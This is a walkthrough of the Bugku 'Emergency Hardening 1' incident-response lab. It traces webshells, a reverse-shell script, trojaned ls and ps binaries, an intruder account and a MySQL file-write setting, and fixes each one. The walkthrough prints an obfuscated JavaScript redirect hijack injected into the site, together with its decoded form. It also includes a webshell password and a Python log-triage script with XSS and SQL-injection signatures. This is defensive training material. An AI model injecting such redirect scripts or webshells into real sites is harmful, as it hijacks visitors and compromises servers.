To get the JS-hijack domain, just open the target IP directly: it automatically redirects to https://www.194nb.com, so submit that as the flag.
Analyze the log at /var/log/nginx/access.log.
The webshell is at /var/www/html/public/Uploads/6127418cad73c.php.
Another way to find it is to visit the site and capture the traffic: the page automatically requests 6127418cad73c.php.
Log in to the server and cat the file to see the password.
The password is: QjsvWsp6L84Vl9dRTTytVyn5xNr1
The malicious IP that uses the trojan above is 123.139.39.161.
Search the log for that IP's malicious requests: the earlier one is XSS and the later one is SQL injection. The question asks for the first attack, so the answer is xss (it must be lowercase).
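As an added example (not part of the original writeup), a small Python triage script for the log-analysis steps above: it parses nginx access-log lines in the combined format, lists which clients requested the uploaded webshell path, and labels each source IP's first matching request as xss or sqli using rough signatures. The sample log lines, the LINE_RE pattern and the SIGNATURES table are constructed assumptions, not data from the challenge box.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in nginx "combined" format (not the challenge's real log).
SAMPLE_LOG = """\
123.139.39.161 - - [26/Aug/2021:10:01:02 +0000] "GET /index.php?s=<script>alert(1)</script> HTTP/1.1" 200 512 "-" "Mozilla/5.0"
123.139.39.161 - - [26/Aug/2021:10:03:45 +0000] "GET /index.php?id=1%27%20union%20select%201,2,3-- HTTP/1.1" 200 733 "-" "Mozilla/5.0"
123.139.39.161 - - [26/Aug/2021:10:09:10 +0000] "POST /public/Uploads/6127418cad73c.php HTTP/1.1" 200 88 "-" "antSword/v2.1"
10.0.0.5 - - [26/Aug/2021:10:10:00 +0000] "GET /public/static/img/logo.png HTTP/1.1" 200 4096 "http://target/" "Mozilla/5.0"
"""

# Assumed combined-format layout: ip ident user [time] "method path proto" status bytes "referrer" "ua"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referrer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Rough attack signatures, applied to the URL-decoded path + query string.
SIGNATURES = [
    ("xss", re.compile(r"<script|onerror=|javascript:", re.I)),
    ("sqli", re.compile(r"union\s+select|'\s*or\s+|sleep\(|--\s*$", re.I)),
]

def parse_log(text):
    """Return one dict per parseable line; the request path is URL-decoded."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            d = m.groupdict()
            d["path"] = unquote(d["path"])
            entries.append(d)
    return entries

def classify(path):
    """First signature name that matches, or None for a benign-looking request."""
    for name, rx in SIGNATURES:
        if rx.search(path):
            return name
    return None

def webshell_clients(entries, shell_path):
    """IPs that requested the webshell path, in first-seen order."""
    seen = []
    for e in entries:
        if e["path"].split("?")[0] == shell_path and e["ip"] not in seen:
            seen.append(e["ip"])
    return seen

def first_attack_by_ip(entries):
    """Earliest attack category per IP (the log is already in time order)."""
    first = {}
    for e in entries:
        kind = classify(e["path"])
        if kind and e["ip"] not in first:
            first[e["ip"]] = kind
    return first
```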
Run ps -aux to list current processes and filter for those owned by www-data.
There is a malicious 1.sh; reading it shows it is a reverse-shell script.
The hacker's second webshell is at /var/www/html/public/static/img/1.php.
Connect to the hacker's earlier webshell; this is only for convenience when working with the database, in practice you should open mysql from the terminal.
Connect to the database; the account and password are in /var/www/html/application/database.php.
Connect with AntSword and check whether MySQL is allowed to write files:

    SHOW VARIABLES LIKE "secure_file_priv";

The secure-file-priv value in my.cnf is empty, meaning MySQL can write files anywhere on the server.
Set secure-file-priv to NULL, then restart MySQL:

    /etc/init.d/mysql restart

Fixed.
List all current accounts and delete the hacker's account aman:

    ps -u aman        # confirm no other processes are running as aman
    userdel -r aman   # delete the account

Fixed.
The challenge asks you to repair commands tampered with by the hacker. Look in /bin: ls and ps are suspicious (you can notice it just by running them: a normal ls prints several file names per line, while this fake ls prints each file name on its own line).
cat shows that ls and ps are fakes, while ls2 and ps_ are the genuine binaries.
Delete ls and ps, restore the genuine ls2 and ps_, and delete the "immortal" webshell (不死马) that the fake ls writes with echo:

    rm -rf ls
    rm -rf ps
    mv ls2 ls
    mv ps_ ps
    rm -rf /var/www/html/public/static/img/1.php

Click fix.
Since visiting the page redirects, capture the traffic; there is a mysterious piece of code:

    <script type="text/javascript">
    ['sojson.v4']["\x66\x69\x6c\x74\x65\x72"]["\x63\x6f\x6e\x73\x74\x72\x75\x63\x74\x6f\x72"](((['sojson.v4'] + [])["\x63\x6f\x6e\x73\x74\x72\x75\x63\x74\x6f\x72"]['\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65']['\x61\x70\x70\x6c\x79'](null, "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" ['\x73\x70\x6c\x69\x74'](/[a-zA-Z]{1,}/))))('sojson.v4');
    </script>
Decoded (the escaped property names are filter, constructor, fromCharCode, apply and split), it is roughly as follows; it simply redirects to the 194nb site:

    var Jtrvg1 = /\.(sogou|so|haosou|baidu|google|youdao|yahoo|bing|gougou|118114|vnet|360|ioage|sm|sp)(\.[a-z0-9/-]+){1,2}/ig;
    var m_gg2 = window["document"]["referrer"];
    if (Jtrvg1["test"](m_gg2)) {
        window["location"]["href"] = "https://www.194nb.com";
        h = {flag: "{nwmb8rkt5nun3pif5ws.ya4nks02zk}"};
    } else {
        location['href'] = "https://www.194nb.com";
    }
Now we just need to find the file containing this code and delete it.
The file path is /var/www/html/application/home/view/public/js.html.
After deleting it, click check to pass the level.
Originally published on the WeChat official account 7coinSec: Bugku 应急加固1 通关详解 (Bugku Emergency Hardening 1 walkthrough).